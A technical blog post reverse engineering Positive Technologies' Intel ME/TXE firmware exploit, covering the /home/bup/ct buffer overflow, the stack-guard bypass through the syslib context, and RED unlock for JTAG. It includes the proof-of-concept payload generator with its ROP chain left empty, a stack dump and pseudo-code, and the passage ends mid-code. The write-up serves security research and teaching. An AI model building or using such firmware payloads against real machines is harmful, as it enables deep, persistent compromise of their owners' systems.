Let me tell you a story…. (I think I’ll start all my blog posts with that considering how long they always end up being)

I’ve been working for a while now on reproducing the Intel vulnerability that PT Research disclosed at BlackHat Europe 2017. I’ve succeeded, and I want to share my journey and experience with everyone, in the hope that it helps others take control of their machines (and not the other way around).

First, for those who are unaware, Positive Technologies (referred to here as ‘PT Research’, ‘PT Security’ or just ‘PT’) released information at BlackHat Europe 2017 about a way to run unsigned code on the Intel Management Engine. And for those who are unaware, the Intel ME is a ‘security’ processor that runs on every Intel chip (since 2006) and that supposedly has full access to our systems. You can read more about it here and here, but the description that I’ve read and that stuck with me the most is this one from Libreboot’s FAQ (though it is a little outdated).

What’s the Intel Management Engine ?

In summary, the ME (Management Engine) is a second processor embedded in every PCH (the motherboard’s chipset) which runs with the highest privilege possible. It runs its own Intel-signed firmware, and takes care of a lot of things that you don’t know it does, the best known being AMT (Intel Active Management Technology), which allows a system administrator to remotely access, control, update, reformat, KVM, etc. a computer through the network, even if the computer is turned off. It’s called “out-of-band” management because it doesn’t rely on software running on the main CPU (like TeamViewer/Skype remote desktop or anything like that): it works even if your entire OS is corrupted, or has a virus, or the machine is actually turned off.

That’s pretty scary, and if you’re wondering why Intel did this, well the rationale is that when you’re a system administrator in a company that has thousands of computers, or a university or even a small business with a dozen computers, and you want to update them all to a newer security update or whatever, then you can do it all at once from the comfort of your chair, and you don’t need to go through the entire building, and insert a USB key into each machine, and turn on those machines that were powered off, etc.. The real question however is why, for consumers, is the option to disable the ME not available ? As a regular user, I don’t need that ability to remotely control my machine, so I want to disable it, but I can’t. This has led to a lot of FUD (Fear, Uncertainty & Doubt) surrounding the ME as a way for Intel to control the world!

Intel CEO

I wanted to figure out what was true and what wasn’t as I dug deep into reverse engineering and poking at the ME. The ME does have a legitimate function, but it does so much more now, as it takes care of the hardware initialization, the main CPU boot up, control of the clock registers, DRM management for Audio/Video, software based TPM and more. Those extra tasks are supposedly why it cannot be deactivated for consumer products. It unfortunately also means that you have to trust that Intel isn’t doing anything malicious (or allowing others to do something malicious through their incompetence). It’s not that I think Intel are malicious, but that doesn’t mean I trust them implicitly either. I started to look into the ME, trying to get my code to execute on it using the exploit PT had divulged, and I took on the mission of getting the ME to control and spy on my USB devices. This started when I was still working with Purism, but even after I left that company, I continued working on this, on and off, for a little over a year now, and I’ve finally made enough progress that I think it warrants writing something about it. Especially since I’ve ‘revived’ this blog in the last month with a couple of posts about reverse engineering too.

First things first. The Intel Management Engine (IME) or Management Engine (ME) is also called the CSME (Converged Security and Management Engine) or just CSE (Converged Security Engine) and sometimes called TXE (Trusted eXecution Engine) or SPS (Server Platform Services) and it used to be called Intel Management BIOS Extension (IMEBx). It can get quite confusing, especially considering that “the ME” can refer both to the Management Engine processor core itself and to the Management Engine firmware, which are often indistinguishable from each other. I haven’t looked at the IMEBx (it’s old) or the SPS (don’t care about servers), but I think we can safely say that the ‘CSE’ and ‘CSME’ are the hardware cores, and the ‘TXE’ and ‘ME’ are their firmwares, respectively. I’m not sure if it’s exactly true, as I’ve heard ‘CSME’ also refer to the firmware, not just the hardware, but mostly all of these terms are interchangeable and I’ve seen Intel documents use them interchangeably as well.

I can also say with fair certainty that the CSE and CSME are the same thing: they are the same hardware as far as I can see, and their firmware is pretty much the same. The CSE is used for ‘low power/cheap’ platforms, such as Celeron/Apollolake for example (set-top boxes, netbooks, cheap and underpowered laptops, etc..), while CSME is used for ‘desktop/laptop’ high end CPUs such as Skylake, Kabylake, Coffeelake, etc… The main difference between the two is that CSE doesn’t include the AMT (remote administration feature) while CSME does include it. The CSE runs the TXE firmware, which is the exact same as the ME firmware, but again without the AMT features. I obviously can’t try to run the ME firmware on an Apollolake with the CSE because each version will only work for one platform (hardware initialization/registers being specific per platform), but looking at their code, I can say that they are pretty much identical: one does more than the other, but it’s the same code, same base architecture/functioning. TXE/CSE is probably just cheaper for Intel because there are fewer features for them to test/QA before release.

In this post, I will be talking about both the CSE and CSME, because PT Research has released their exploit so we can run our own code on the Apollolake platform (running TXE on CSE) and what I’ve done is both play with that and also port it to work on the Skylake platform (running ME on CSME).

Understanding the CSE exploit in order to do the CSME exploit

The first thing I want to explain is how to run your own code on the CSE (TXE v3.0). This will be pretty long, so I think I’ll divide this article into 3 posts, one that I will try to write each day. First, understanding the CSE exploit, then porting the exploit to CSME, then how to play around with the USB controller through the ME.

You can already refer to Positive Technologies’ presentation given by Mark Ermolov and Maxim Goryachy at BlackHat Europe 2017. You can download their slides here and presentation here. It explains (mostly) everything you need to do. Then you can have a look at their Proof of Concept release of the exploit on github for Apollolake systems.

Before you go further, this post isn’t going to be like my previous posts that try to explain things on a very basic level (and often fail at remaining basic the further along you read). This is going to get very technical very fast, and before you continue, you need to read and understand the exploit as explained in the presentation by PT linked above. If you can’t follow it, then you’re just going to get lost, as I am assuming that you’ve read it and understood it all.

Here’s a quick summary of the exploit PT have divulged in their presentation :

The ME firmware consists of multiple ‘partitions’, one of them being the ‘MFS’ partition (ME File System) which contains various configuration files.

While most partitions are signed and cannot be modified as they contain code, the MFS partition is not and can therefore be modified by us mortals. Additional restrictions within it mean that not all of its files are user-modifiable.

A file in the MFS partition named "/home/bup/ct" is used to initialize the Trace Hub Configuration of the ME and is user-modifiable.

The ME process BUP (Hardware Bring-UP) reads the entire "/home/bup/ct" file into a buffer of size 808 without checking that the file will fit : we have a buffer overflow exploit here.

There is a security-cookie/stack-guard that protects the ME against buffer overflows, which makes the buffer overflow useless on its own.

At the very bottom of the stack (the first 0x18 bytes of the stack) resides the TLS structure (Thread Local Storage) which contains a pointer to the syslib context.

The "/home/bup/ct" file is read in chunks of 64 bytes, and copied into a shared memory block.

Writing to the shared memory block (with the sys_write_shared_mem function) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure.

Overwriting the stack all the way to the bottom in order to overwrite the syslib context, pointing it to a custom-made shared memory block which has the destination address pointing to the memcpy’s return address, lets us control where we want the function to return, thus bypassing the security-cookie/stack-guard protection that is in place.

By using both the buffer overflow exploit and the TLS/syslib-context/shared-memory exploit, we can control the code that gets executed using ROPs : running our own unsigned code.

Using another presentation from Positive Technologies, this time at the 34th Chaos Communication Congress, we can see that the Intel chipsets support JTAG which allows full debugging capabilities. In order to be able to JTAG the ME core itself, we would need to have ‘RED’ level unlock. See this little helpful table, taken from yet another Positive Technologies presentation (BlackHat Asia 2019)

All we need to do to enable RED unlock is to write the value 3 to the DfX Aggregator register. That’s pretty easy to do once we have our own code running on the ME, so we can create a ROP chain that enables DCI and Red Unlock mode and gives us full ME JTAG control from another PC over USB.

Something you might not realize at first (and I didn’t until I dug deep) is that the exploit explained in the BlackHat Europe 2017 presentation is very different from what they’ve released as their proof of concept. The buffer overflow in reading the "/home/bup/ct" file is the same, but that’s the easy part (hard to find, but easy to use : write a file with a size of more than 808 bytes). I don’t know why, don’t ask, and I haven’t asked them either, but they decided to release the proof of concept for Apollolake (TXE 3.x) rather than for Skylake (ME 11.x) even though their presentation was about how to exploit it on Skylake. I figured that if I wanted to port their exploit to Skylake, I needed to first understand how it works on Apollolake, then it should just be a matter of finding the right offsets for my version of the ME on Skylake, right?… No. It actually took me a long time to figure out that what they are doing is a different exploit. In their presentation they were talking about how they overwrite the TLS with the syslib context in order to take over the shared memory destination address, so they can control the memcpy to overwrite their function’s return address and bypass the stack guard security cookie.

The problem with that method is that it requires two reads: the first one to overwrite the TLS/syslib context, and the second one to cause the memcpy operation that lets the exploit happen. On Skylake, it’s not a problem: the "/home/bup/ct" file gets read in chunks of 64 bytes, so you overwrite the syslib context with one chunk, then you overwrite your return address with the next chunk. On Apollolake, unfortunately, it doesn’t seem to use chunked reads. Because it’s a simplified firmware, the MFS (ME File System) on the flash is different, I assume, and the file is read in one shot. Which means that the exploit in the presentation cannot be used. So… what do they do ?

The TXE Exploit

If you follow their instructions in their IntelTXE-PoC repository, you’ll see that the entire TXE exploit is stored in the "/home/bup/ct" file (Trace Hub Configuration) which gets generated by the me_exp_bxtp.py script. That’s the file you generate; then, when you configure the ME using Intel’s tools and set the CT file in the “Trace Hub Configuration” field, the exploit happens. But what does it do exactly? What’s in that file? The script that generates it unfortunately has a few magic numbers that took me a long time to figure out. Let’s look at them :

    import struct

    STACK_BASE = 0x00056000
    BUFFER_OFFSET = 0x380
    SYS_TRACER_CTX_OFFSET = 0x200
    SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
    RET_ADDR_OFFSET = 0x338

    def GenerateTHConfig():
        print("[*] Generating fake tracehub configuration...")
        trace_hub_config = struct.pack("<B", 0x0)*6
        trace_hub_config += struct.pack("<H", 0x2)
        trace_hub_config += struct.pack("<L", 0x020000e0)
        trace_hub_config += struct.pack("<L", 0x5f000000)
        trace_hub_config += struct.pack("<L", 0x02000010)
        trace_hub_config += struct.pack("<L", 0x00000888)
        return trace_hub_config

    def GenerateRops():
        print("[*] Generating rops...")
        # Let's ignore this for now (empty placeholder so the sample still runs)
        return b""

    def GenerateShellCode():
        syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
        data = GenerateTHConfig()
        init_trace_len = len(data)
        data += GenerateRops()
        # Pad with zeros up to the return address slot
        data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data))
        data += struct.pack("<L", 0x00016e1a)
        data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)
        data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4)
        # Pad again so that data_tail ends exactly at BUFFER_OFFSET
        data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail))
        data += data_tail
        return data

I’ve ignored the ROPs, they’re not important for now, but if we look at the magic numbers, first, the STACK base address is 0x56000, cool, good to know.. where did they find it? no idea! Why is the buffer offset 0x380? What’s this 0x55c58 address that is SYS_TRACER_CTX_REQ_OFFSET ? Why is the RET_ADDR_OFFSET set to 0x338 ? And then all those magic values in the GenerateTHConfig function. At first, I thought that it was just a valid Trace Hub file and that if it didn’t start with those values, it would be rejected, but it turns out those values are important for the exploit to happen. Then there is that magic value 0x00016e1a that gets written in GenerateShellCode, right after the padding up to RET_ADDR_OFFSET.. what is that?

This article will answer all of those questions, as I’ve worked on reverse engineering the exploit itself. I will spare you all the reverse engineering and research I did on the ME itself in order to understand how the kernel creates its processes, how/where it sets up the stack, and how the TLS structure gets created and by whom (I wasted too much time looking at the kernel instead of just concentrating on the BUP process itself). I’ll look at that a little bit more in the next post.

After the exploit runs and I have a halted ME thread in the python console, I used the JTAG commands and dumped the stack to see what functions had run. I could follow every call that way and figured out what happened, who called who until the exploit was triggered. It’s probably a bit hard to read and I’m not going to try and explain it, but here’s the dump of the stack with my notes on the side showing what variables, registers and ret addresses are appearing on each line :

    01bf:0000000000055950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055960: 00 00 00 00 cc 59 05 00 c8 59 05 00 18 00 00 00 -- garbage - push edi (in _memset_0)
    01bf:0000000000055970: dc 18 00 00 40 30 09 00 ff ff ff ff 18 00 00 00 -- retaddr to _memset_0 - ebx (addr) - push 0xffffff (value) - push edi (length)
    01bf:0000000000055980: 11 00 00 00 d1 01 00 00 22 00 00 00 b1 02 00 00 -- previously pushed ecx - ebx - esi - edi
    01bf:0000000000055990: 04 5a 05 00 89 6d 00 00 04 30 09 00 d1 01 00 00 -- ebp 0x055a04 - retaddr to sub_1119 - var_54 - ebx
    01bf:00000000000559a0: b0 02 00 00 3c 5a 05 00 d0 4d 02 00 70 5a 05 00 -- eax - LOCALS[0x54]
    01bf:00000000000559b0: 04 30 09 00 44 90 09 00 d0 01 00 00 d2 02 00 00
    01bf:00000000000559c0: 21 00 00 00 6f 03 00 00 ff 03 00 00 00 00 00 00
    01bf:00000000000559d0: ff ff ff ff 00 00 00 00 84 30 09 00 84 30 09 00
    01bf:00000000000559e0: 04 30 09 00 e1 00 00 00 02 01 00 00 91 00 00 00
    01bf:00000000000559f0: d0 01 00 00 20 8e ff 6e 44 90 09 00 80 03 00 00 -- LOCALS[0x54] - ebx - esi
    01bf:0000000000055a00: 00 30 09 00 50 5a 05 00 ee 6e 00 00 44 90 09 00 -- edi - ebp 0x055a50 - retaddr to sub_6CA2 - ebx
    01bf:0000000000055a10: 04 30 09 00 00 04 00 00 00 4c 02 00 e0 00 00 00 -- ecx - eax - eax - eax
    01bf:0000000000055a20: 01 00 00 00 70 5a 05 00 3c 5a 05 00 db f1 e8 6b -- eax - eax - eax - LOCALS[0x18]
    01bf:0000000000055a30: 74 5a 05 00 40 5a 05 00 1d 84 01 00 03 00 00 00
    01bf:0000000000055a40: 64 5a 05 00 ea 34 01 00 04 00 00 00 58 5a 05 00 -- LOCALS[0x18] - ebx - esi - ebp ** INVALID STACK ABOVE THIS POINT
    01bf:0000000000055a50: bd 25 01 00 20 8e ff 6e 72 5a 05 00 00 00 00 00 -- retaddr to sys_get_ctx_struct_addr ** INVALID STACK ABOVE THIS POINT
    01bf:0000000000055a60: d8 5a 05 00 a4 5a 05 00 4a 2a 01 00 72 5a 05 00 -- INVALID - ebp - retaddr to sub_134C6 - ebx
    01bf:0000000000055a70: 20 00 43 02 00 02 08 00 0e 00 56 00 02 00 86 80 -- LOCALS[0x2C]
    01bf:0000000000055a80: 80 03 00 00 04 00 00 00 94 5a 05 00 1d 84 01 00
    01bf:0000000000055a90: 03 00 00 00 a0 5a 05 00 20 8e ff 6e 8c 5a 05 00 -- LOCALS[0x2C] - ebx
    01bf:0000000000055aa0: 44 37 09 00 b8 5a 05 00 e5 2b 01 00 0e 00 56 00 -- esi - ebp - retaddr to sub_129C9 - arg0 ** INVALID STACK HERE AND ABOVE
    01bf:0000000000055ab0: 04 00 00 00 c8 5a 05 00 10 6c 00 00 00 00 00 00 -- 4 - ebp 0x55aC8 sub_6A68 - retaddr to sub_6A50 - eax
    01bf:0000000000055ac0: 0e 00 56 00 0e 00 00 00 f8 5a 05 00 62 84 00 00 -- X - X - ebp 0x55AF8 sub_8309 - retaddr to sub_6a68
    01bf:0000000000055ad0: 80 03 00 00 00 8e ff 6e 8c 5a 05 00 80 03 00 00 -- LOCALS[0x1C]
    01bf:0000000000055ae0: 44 37 09 00 28 5b 05 00 20 8e ff 6e 00 00 00 00 -- LOCALS[0x1C] - ebx
    01bf:0000000000055af0: 80 03 00 00 44 37 09 00 28 5b 05 00 2a 81 02 00 -- esi - edi - ebp 0x55B28 sub_2808E - retaddr to sub_6082
    01bf:0000000000055b00: 44 37 09 00 00 03 00 00 00 00 00 00 29 9a 07 00 -- edi - LOCALS[0x18]
    01bf:0000000000055b10: 80 03 00 00 44 37 09 00 20 8e ff 6e 80 03 00 00 -- LOCALS[0x18] - ebx
    01bf:0000000000055b20: 29 8a 07 00 64 5c 05 00 90 5b 05 00 28 99 02 00 -- esi - edi - ebp 0x55B90 bup_read_mfs_file - retaddr to sub_2A678
    01bf:0000000000055b30: 29 9a 07 00 80 03 00 00 02 00 00 00 00 03 00 00 -- a1 - src_size (0x380) - sm_block_id (2) - proc_thread_id (0x300)
    01bf:0000000000055b40: 00 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff -- proc_thread_id - a6, a7, a8
    01bf:0000000000055b50: 00 00 00 00 01 00 00 00 00 00 00 00 68 5b 05 00 -- a9 - 10 - LOCALS[0x2C] - ebp 0x55b68 _get_tls_slot
    01bf:0000000000055b60: 1d 84 01 00 03 00 00 00 8c 5b 05 00 ea 34 01 00 -- retaddr to get_tls_slot - arg0 (3), ebp 0x55b8c sub_134C6 - retaddr to sub_13495
    01bf:0000000000055b70: 04 00 00 00 80 5b 05 00 bd 25 01 00 20 8e ff 6e -- X - ebp 0x55b80 sub_1253 - retaddr to sys_get_ctx_struct_addr - COOKIE ** INVALID
    01bf:0000000000055b80: 9a 5b 05 00 00 00 00 00 04 00 00 00 cc 5b 05 00 -- LOCALS[0x2C] - ebx - esi - ebp 0x55bcc sub_129C9
    01bf:0000000000055b90: 4a 2a 01 00 9a 5b 05 00 ac 5b 43 02 00 02 08 00 -- retaddr to sub_134C6
    01bf:0000000000055ba0: 01 00 56 00 02 00 86 80 64 5c 05 00 48 5c 05 00
    01bf:0000000000055bb0: 81 13 03 00 02 00 00 00 5f 73 6b 75 00 65 00 00
    01bf:0000000000055bc0: 20 8e ff 6e 58 5a 05 00 00 00 00 00 e0 5b 05 00 -- LOCALS -- - ebp 0x55BCC sub_12BD6 ** INVALID
    01bf:0000000000055bd0: e5 2b 01 00 01 00 56 00 f4 5b 05 00 ae 6f 00 00 -- retaddr to sub_129C9 * INVALID - X - ebp 0x55bf4 sub_6F3D - retaddr 0x6fae to sub_6A50
    01bf:0000000000055be0: 00 00 00 00 02 00 00 00 01 00 56 00 02 00 00 00 -- add esp, 0C - ebx
    01bf:0000000000055bf0: 80 5c 05 00 24 5c 05 00 bc 7a 00 00 00 00 00 00 -- esi - ebp 0x55c24 sub_7A91 - retaddr 0x7abc to sub_6f3D
    01bf:0000000000055c00: 00 00 00 00 00 00 00 00 00 00 e0 01 e4 9b 04 00
    01bf:0000000000055c10: 00 00 00 00 20 8e ff 6e 02 00 00 00 80 5c 05 00
    01bf:0000000000055c20: 04 00 05 00 40 5c 05 00 9c 7c 00 00 00 00 00 00 -- LOCAL - ebp 0x55c40 sub_7C88 - retaddr 0x7c9c to sub_7A91
    01bf:0000000000055c30: 04 00 00 00 0a 00 05 00 00 00 00 00 e4 9b 04 00
    01bf:0000000000055c40: 50 5c 05 00 5e 69 00 00 0a 00 05 00 e4 9b 04 00 -- ebp 0x55c50 sub_6950 - retaddr 0x695e to sub_7C88
    01bf:0000000000055c50: b4 5f 05 00 e4 9b 04 00 0a 00 05 00 07 00 00 00 -- ebp 0x55fb4 - retaddr 0x49be4 to sub_6078
    01bf:0000000000055c60: bf 00 00 00 80 03 00 00 07 00 00 00 4b 52 4f 44
    01bf:0000000000055c70: 14 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055c80: 00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f
    01bf:0000000000055c90: 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055d60: 00 00 00 00 15 a8 04 00 c7 00 00 00 18 10 00 00
    01bf:0000000000055d70: 39 a8 04 00 c7 00 00 00 08 10 00 00 01 00 00 00
    01bf:0000000000055d80: c7 00 00 00 1c 10 00 00 15 a8 04 00 c7 00 00 00
    01bf:0000000000055d90: 18 10 00 00 39 a8 04 00 c7 00 00 00 08 10 00 00
    01bf:0000000000055da0: 01 00 00 00 c7 00 00 00 1c 10 00 00 00 01 00 00
    01bf:0000000000055db0: 00 00 00 00 9f 01 00 00 00 00 00 00 10 10 00 00
    01bf:0000000000055dc0: 77 a8 04 00 c7 00 00 00 08 10 00 00 be 11 00 00
    01bf:0000000000055dd0: 76 a8 04 00 9f 01 00 00 00 84 00 00 03 00 00 00
    01bf:0000000000055de0: 2d a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055fb0: 00 00 00 00 00 00 00 00 1a 6e 01 00 98 5d 05 00 -- pop ESP 0x55c98
    01bf:0000000000055fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01bf:0000000000055ff0: 58 5a 05 00 0c 00 00 00 00 03 00 03 fc 5f 05 00
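If you want to read a dump like this without doing the byte swapping in your head, a few lines of Python are enough. This is just a small helper sketch of my own (the function name parse_dump_row is made up, it is not part of any PT or Intel tool) that splits one row into its address and four little-endian DWORDs, dropping the notes after the "--" :

```python
import struct

def parse_dump_row(row):
    """Split one 'segment:address: 16 hex bytes -- notes' row into (address, dwords)."""
    _segment, address, rest = row.split(":", 2)
    hex_part = rest.split("--", 1)[0]           # drop the trailing notes, if any
    data = bytes.fromhex("".join(hex_part.split()))
    dwords = struct.unpack("<%dL" % (len(data) // 4), data)
    return int(address, 16), dwords

# Row copied from the dump above (the arguments pushed for bup_read_mfs_file)
row = ("01bf:0000000000055b30: 29 9a 07 00 80 03 00 00 02 00 00 00 00 03 00 00 "
       "-- a1 - src_size (0x380) - sm_block_id (2) - proc_thread_id (0x300)")

address, dwords = parse_dump_row(row)
for i, value in enumerate(dwords):
    print("0x%05x: 0x%08x" % (address + 4 * i, value))
```

The second, third and fourth DWORDs come out as 0x380, 2 and 0x300, which matches the notes on that row.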

A couple of things first :

The stack is at offset 0x56000

The /home/bup/ct file gets read into offset 0x55C80

We can see the call to bup_read_mfs_file at 0x55b28, but the stack is corrupted all the way to 0x55BC0, meaning that all those functions above that line were called and already returned when the exploit happened. According to the assembly code, the TXE doesn’t read the file in chunks or copy it to shared memory, so by the time bup_dfs_read_file returns, no memcpy on shared memory was called and the exploit hasn’t run. The reason for that is that the file isn’t read into the stack then copied to a shared memory, instead, a shared memory block is created pointing to the stack, then reading the data gets it to the stack by using the sys_write_shared_mem function. So once the buffer overflow is done, the copy is also done.
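Those two addresses already explain a few of the magic numbers from the script. Here is a quick sanity check, which is my own arithmetic and not something taken from PT’s code: it only combines the stack top, the address where the file lands, the 808 byte buffer size and the constants of me_exp_bxtp.py. The names in the layout dictionary are labels I made up for readability :

```python
# Observations from the dump and from the presentation
CT_DATA_ADDR = 0x55C80       # where /home/bup/ct is read to
CT_BUFFER_SIZE = 808         # size of the on-stack buffer

# Constants from me_exp_bxtp.py
STACK_BASE = 0x00056000
BUFFER_OFFSET = 0x380
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55C58
RET_ADDR_OFFSET = 0x338
INIT_TRACE_LEN = 6 + 2 + 4 * 4   # number of bytes packed by GenerateTHConfig

layout = {
    # The file starts BUFFER_OFFSET bytes below the top of the stack
    "file_start": STACK_BASE - BUFFER_OFFSET,
    # First address that no longer belongs to the 808 byte buffer
    "buffer_end": CT_DATA_ADDR + CT_BUFFER_SIZE,
    # Address that receives the 0x00016e1a value
    "ret_addr_slot": CT_DATA_ADDR + RET_ADDR_OFFSET,
    # Fake syslib context address written in data_tail
    "syslib_ctx_start": SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET,
    # DWORD written right after 0x00016e1a: first byte after the ct header
    "after_header": STACK_BASE - BUFFER_OFFSET + INIT_TRACE_LEN,
    # data_tail is 5 DWORDs that end exactly at the top of the stack
    "data_tail_start": STACK_BASE - 5 * 4,
}

for name, value in layout.items():
    print("%-18s 0x%05X" % (name, value))
```

So BUFFER_OFFSET is simply the distance between the start of the file buffer and the top of the stack, which means a 0x380 byte file fills the stack all the way up to 0x56000, and RET_ADDR_OFFSET lands 0x10 bytes past the end of the 808 byte buffer.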

If you’re wondering what I mean by bup_dfs_read_file and bup_read_mfs_file, here’s a little pseudo-code of how the TXE’s BUP module initializes itself from the entry point to the time the exploit runs (only relevant code is shown, and it’s oversimplified). It shows the function calls that would appear in the stack, in the right order. If you want to follow along in IDA, it’s using TXE version 3.0.1.1107:

    // sub_2604C
    // The entry point. First code executed after the kernel launches the BUP process
    void bup_entry() {
        // Initialize stack, tls, syslib, etc...
        // bup_init();

        // then call the main function
        bup_main();
    }

    // sub_35001
    // The main function I assume which does most of everything
    void bup_main() {
        // All sorts of initialization of stuff
        // function1(); function2();

        bup_run_init_scripts();

        // Some more stuff
        // function3(); function4();
    }

    // sub_355E0
    // This runs 'scripts', it basically loops through an array of arrays
    // containing functions and calls each of those functions.
    // Each function will initialize one part of the hardware.
    void bup_run_init_scripts() {
        // Simplification of what it does
        for (int i = 0; i < num_scripts; i++)
            scripts[i]();
    }

    // 0x4FDCC
    // Simplification of the scripts array, it actually is an array of structures,
    // each with an id and two script arrays within each structure.
    void (*scripts[])(void) = {
        bup_init_this,
        bup_init_that,
        bup_init_storage,
        bup_init_dci,
        bup_init_trace_hub,
        bup_init_other,
        // etc.. 94 total functions get called.
    };

    // sub_49842
    // This initializes the trace hub functionality by reading the /home/bup/ct file.
    // This is where the exploit happens.
    void bup_init_trace_hub() {
        char ct_data[808];
        int file_size;
        int bytes_read;

        // again, simplification
        bup_dfs_get_file_size("/home/bup/ct", &file_size);
        bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read);

        // Handle the content of the CT file
        // for () {}
        // bup_init_trace_hub_set_systracer();

        // Stack Guard
    }

    // sub_3123B
    // This reads a file from storage
    int bup_dfs_read_file(char *file_name, int offset, char *buffer,
                          unsigned int read_size, unsigned int *out_bytes_read) {
        // Complex function (250 lines) that ends up doing this, more or less :
        int shmem_blockid = create_shared_memory_block(sys_get_thread_id(), buffer, read_size);
        CFGRecord *file = get_cfg_file_record(file_name);
        bup_read_mfs_file(mfs_partition, file->offset + offset, shmem_blockid, read_size, out_bytes_read);
        release_shared_memory_block(shmem_blockid);

        // Stack Guard
    }

    // sub_297BA
    // Read the MFS file content and copies it to shared memory
    // the function is more complex than shown, its arguments as well,
    // I've removed anything not important.
    int bup_read_mfs_file(void *mfs_partition, int offset, int shmem_blockid,
                          unsigned int read_size, unsigned int *out_bytes_read) {
        *out_bytes_read = read_size;
        sys_write_shared_memory(shmem_blockid, mfs_partition + offset, read_size, read_size);

        // Stack Guard
    }

    // sub_AE87
    // This is in the syslib module, not the BUP module.
    int sys_write_shared_memory(int blockid, void *src, int src_size, int write_size) {
        SHMem *block = get_shared_memory_block(blockid);
        memcpy(block->addr, src, write_size);

        // Stack Guard
    }
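To make the “the copy is the overflow” point concrete, here is a toy model in Python. It is only a sketch under my own assumptions: the Stack class and the dictionary standing in for the shared memory block descriptor are made up for illustration, and the cookie is placed right after the 808 byte buffer (0x55FA8 in the stack layout shown further down). The cookie value is the one that shows up in the dump above.

```python
import struct

STACK_TOP = 0x56000
CT_DATA_ADDR = 0x55C80      # address of ct_data on the stack
CT_BUFFER_SIZE = 808        # char ct_data[808]
COOKIE = 0x6EFF8E20         # cookie value as seen in the dump (20 8e ff 6e)

class Stack:
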